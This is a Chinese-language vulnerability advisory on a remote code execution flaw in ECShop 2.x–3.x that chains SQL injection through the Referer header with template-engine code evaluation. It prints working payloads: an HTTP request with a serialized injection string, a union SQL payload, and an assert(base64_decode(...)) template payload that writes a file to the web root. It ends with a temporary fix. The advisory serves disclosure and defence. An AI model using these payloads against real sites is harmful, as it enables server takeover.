一 漏洞概述

1.1简介

     ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势，该漏洞可直接导致网站服务器沦陷，黑客可通过WEB攻击直接获得服务器权限，利用简单且危害较大。因此，ScanV提醒ECShop系统用户及时进行修复。

1.2漏洞危害

     该漏洞可直接导致网站服务器沦陷，黑客可通过WEB攻击直接获得服务器权限。

1.3 影响版本

• ECShop 2.x-3.x
  
  

二 漏洞分析

2.1 前言

    问题发生在user.php的display函数，模版变量可控，导致注入，配合注入可达到远程代码执行

2.2 SQL注入

    先看user.php

$back_act变量来源于HTTP_REFERER，我们可控。

assign函数用于在模版变量里赋值

再看display函数

读取user_passport.dwt模版文件内容，显示解析变量后的html内容，用_echash做分割，得到$k然后交给isnert_mod处理，由于_echash是默认的，不是随机生成的，所以$val内容可随意控制。

再看insert_mod函数

非常关键的一个地方，这里进行了动态调用

$val传入进来用|分割，参数传入进来时需要被序列化

再看include/lib_insert.php中的insert_ads函数

可以看到这里直接就能注入了

payload:

GET /user.php?act=login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Cookie: PHPSESSID=9odrkfn7munb3vfksdhldob2d0; ECS_ID=1255e244738135e418b742b1c9a60f5486aa4559; ECS[visit_times]=1
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
Connection: close
Upgrade-Insecure-Requests: 1

2.3 代码执行

继续看fetch函数

追踪_eval函数

$position_style变量来源于数据库中的查询结构

然后我们继续构造SQL注入，因为这段sql操作 order by部分换行了截断不了 所以需要在id处构造注释来配合num进行union查询

payload：

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, 
RAND() AS rnd FROM `ecshop27`.`ecs_ad` AS a LEFT JOIN `ecshop27`.`ecs_ad_position` AS p ON a.position_id = p.position_id 
WHERE enabled = 1 AND start_time <= '1535678679' AND end_time >= '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */
 union select 1,2,3,4,5,6,7,8,9,10-- -

函数中有一个判断

我们 id传入’/*

num传入*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10– -就能绕过了

var_dump一下

再看fetch函数,传入的参数被fetch_str函数处理了

追踪fetch_str函数，这里的字符串处理流程比较复杂

return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);

这一行意思是比如$source是xxxx{$asd}xxx,那么经过这行代码处理后就是返回this->select(‘$asd’)的结果

看看select函数

第一个字符为$时进入$this->get_val函数

我们$val没有.$又进入make_var函数

最后这里引入单引号从变量中逃逸

我们要闭合_var所以最终payload是：

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEudHh0JywnZ2V0c2hlbGwnKQ=='));//}xxx

会在网站跟目录生成1.txt 里面内容是getshell

三 影响范围

根据 ZoomEye 网络空间搜索引擎对 ecshop 的搜索结果，共找到 42,417 条历史记录。

三 修复建议

1.在官方补丁没放出之前，我们建议站长可以修改include/lib_insert.php文件中相关漏洞的代码，将$arr[id]和$arr[num]强制将数据转换成整型，该方法可作为临时修复方案将入侵风险降到最低。

2.技术业务咨询：

知道创宇技术业务咨询热线：400-060-9587（政府、国有企业）

                                                028-68360638（互联网企业）